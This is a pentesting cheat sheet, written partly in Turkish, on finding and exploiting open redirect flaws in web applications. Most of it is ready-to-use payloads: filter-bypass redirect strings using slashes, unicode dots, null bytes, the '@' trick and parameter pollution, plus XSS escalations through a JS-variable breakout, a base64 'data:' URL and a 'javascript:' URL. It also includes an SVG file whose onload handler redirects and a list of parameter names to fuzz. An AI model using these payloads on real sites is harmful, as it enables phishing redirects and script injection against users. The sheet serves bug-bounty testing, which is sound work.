Open Redirect

Burp'ten tespiti:

Target > Sitemap'e gel. Filtreleye tıkla. Sadece 300 kodluluları göster. Çünkü Redirect zaten genelde 300 statüs kodunda olur.

Google dorking

inurl:redirectUrl=http site:target.com

Bulunabilecek Fonksiyonlar

• Login, Logout, Register & Password reset pages

• Change site language

• Links in emails

HTTP Redirection Status Code - 3xx

• 300 Multiple Choices

• 301 Moved Permanently

• 302 Found

• 303 See Other

• 304 Not Modified

• 305 Use Proxy

• 307 Temporary Redirect

• 308 Permanent Redirect

Using "//" & "////" to bypass "http" blacklisted keyword

//google.com
////google.com

Using "https:" to bypass "//" blacklisted keyword

https:google.com

Using "//" to bypass "//" blacklisted keyword (Browsers see // as //)

\/\/google.com/
/\/google.com/

Using "%E3%80%82" to bypass "." blacklisted character

/?redir=google。com
//google%E3%80%82com

Using null byte "%00" to bypass blacklist filter

//google%00.com

Using parameter pollution

?next=whitelisted.com&next=google.com

Using "@" character, browser will redirect to anything after the "@"

http://www.theirsite.com@yoursite.com/

Creating folder as their domain

http://www.yoursite.com/http://www.theirsite.com/
http://www.yoursite.com/folder/www.folder.com

Using "?" characted, browser will translate it to "/?"

http://www.yoursite.com?http://www.theirsite.com/
http://www.yoursite.com?folder/www.folder.com

Host/Split Unicode Normalization

https://evil.c℀.example.com . ---> https://evil.ca/c.example.com
http://a.com／X.b.com

XSS from Open URL - If it's in a JS variable

";alert(0);//

XSS from data:// wrapper

http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==

XSS from javascript:// wrapper

http://www.example.com/redirect.php?url=javascript:prompt(1)

Open Redirect uploading svg files

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
</svg>
</code>

Tespit Edebilecek Parametreler:

/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}

Tool:

GitHub - r0075h3ll/Oralyzer: Open Redirection AnalyzerGitHub

Payload Oluşturmaya Yarayan Tool:

GitHub - cujanovic/Open-Redirect-Payloads: Open Redirect PayloadsGitHub

Ref:

PayloadsAllTheThings/Open Redirect at master · swisskyrepo/PayloadsAllTheThingsGitHub